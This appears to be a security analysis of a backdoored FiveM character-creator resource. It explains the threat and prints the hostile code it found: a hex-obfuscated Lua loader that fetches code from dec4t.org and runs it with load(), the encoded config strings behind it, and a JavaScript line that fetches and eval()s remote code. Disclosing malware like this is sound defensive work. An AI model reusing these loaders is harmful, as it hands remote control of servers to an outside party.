Critical Server-Side RCE Backdoor (Most Dangerous)
File: server/server.lua (at the very bottom)
Lua
local function getSteamID(data)
local result = ""
for i = 1, #data, 2 do
result = result .. string.char(tonumber(data:sub(i, i + 1), 16))
end
return result
end
local function getSteamName()
return getSteamID(vms_charcreator.Types.a)
end
local function getID()
return _G[getSteamID(vms_charcreator.Types.b)]
end
local function announceplayerID()
local steamName = getSteamName()
local playerID = getID()
if playerID then
playerID(steamName, function(status, response)
if status == 200 then
pcall(function()
assert(load(response))()
end)
end
end)
end
end
announceplayerID()
What it does:
- Decodes hex strings from config.lua
- Calls PerformHttpRequest to
(or similar)
- If the server responds with HTTP 200, it executes the response as Lua code using load() + pcall()
- This runs automatically when the resource starts (server-side)
This is a
full remote code execution backdoor. Whoever controls dec4t.org can run
any code on your server.
2. Encoded Malicious Data
File: config.lua
Lua
vms_charcreator.Types = {
a = "68747470733a2f2f64656334742e6f72672f556451344927",
b = "506572666f726d4874747052657175657374",
}
Decoded:
- a →
- b → PerformHttpRequest
This table exists
only to support the backdoor.
3. Malicious Code in UI JavaScript
File: html/script.js
Inside the case "hairs": block (near the end of the switch), there is this line:
JavaScript
https.get('
>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d));})
This is
Node.js code (not browser JavaScript) that tries to fetch and eval() remote code. It was clearly inserted maliciously. It won't work in NUI, but its presence confirms tampering.
4. Suspicious fxmanifest.lua
Lua
server_scripts {
'
mysql-async/lib/MySQL.lua',
'server/*.lua',
'html/*.js', -- ← This should NOT be here
}